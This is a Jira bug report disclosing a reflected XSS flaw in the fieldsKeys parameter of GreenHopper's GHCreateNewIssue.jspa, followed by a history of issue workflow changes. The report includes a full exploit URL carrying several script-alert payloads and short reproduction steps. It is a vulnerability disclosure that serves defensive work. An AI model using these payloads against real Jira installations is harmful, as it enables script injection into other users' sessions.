Uploaded image for project: 'Jira Software Data Center'
  1. Jira Software Data Center
  2. JSWSERVER-5575

XSS (reflected) in fieldsKeys parameter of GHCreateNewIssue.jspa

XMLWordPrintable

      Targets: https://test01.jira-dev.com/secure/GHCreateNewIssue.jspa?key=&issueType=7&fieldsKeys=priority,customfield_10006,summary,fixVersions,components,customfield_10005,assignee,customfield_10004,reporter,customfield_100039fd29<script>alert('XSS')</script>15d31825f8e9d6606&fieldsValues=1@%@ @%@XSS"><script>alert('XSS')</script>@%@-1@%@-1@%@1000@%@0@%@100@%@isecpartners@%@iSEC"><script>alert('XSS')</script>&forcedFieldsKeys=&forcedFieldsValues=&createNext=false&projectId=&decorator=none&selectedProjectId=10000&pageType=ChartBoard&subType=ArchiveChartBoard&type=ACB&selectedBoardId=-1&colPage=1
      Reproduction:
      After login open target URL in browser.
      Apply attack value "><script>alert('XSS')</script> in the fieldsKeys parameter.

        1. Screen Shot 2012-08-07 at 1.36.24 PM.png
          Screen Shot 2012-08-07 at 1.36.24 PM.png
          55 kB

            [JSWSERVER-5575] XSS (reflected) in fieldsKeys parameter of GHCreateNewIssue.jspa

            Bugfix Automation Bot made changes -
            Minimum Version New: 5.1
            Owen made changes -
            Workflow Original: JAC Bug Workflow v2 [ 2851434 ] New: JAC Bug Workflow v3 [ 2936783 ]
            Status Original: Resolved [ 5 ] New: Closed [ 6 ]
            Owen made changes -
            Workflow Original: JIRA Bug Workflow w Kanban v7 - Restricted [ 2544108 ] New: JAC Bug Workflow v2 [ 2851434 ]
            Ignat (Inactive) made changes -
            Workflow Original: JIRA Bug Workflow w Kanban v6 - Restricted [ 1550859 ] New: JIRA Bug Workflow w Kanban v7 - Restricted [ 2544108 ]
            Confluence Escalation Bot (Inactive) made changes -
            Labels Original: cvss-high fixme security verified xss New: affects-server cvss-high fixme security verified xss
            Owen made changes -
            Workflow Original: JIRA Bug Workflow w Kanban v6 [ 906399 ] New: JIRA Bug Workflow w Kanban v6 - Restricted [ 1550859 ]
            Security Metrics Bot made changes -
            Labels Original: fixme security verified xss New: cvss-high fixme security verified xss
            Oswaldo Hernandez (Inactive) made changes -
            Workflow Original: GreenHopper Kanban Workflow 20141014 [ 745839 ] New: JIRA Bug Workflow w Kanban v6 [ 906399 ]
            Michael Tokar made changes -
            Remote Link New: This issue links to "Page (Extranet)" [ 101912 ]
            mtokar.adm made changes -
            Workflow Original: GreenHopper Kanban Workflow v2 [ 399463 ] New: GreenHopper Kanban Workflow 20141014 [ 745839 ]

              Unassigned Unassigned
              dblack David Black
              Affected customers:
              0 This affects my team
              Watchers:
              3 Start watching this issue

                Created:
                Updated:
                Resolved: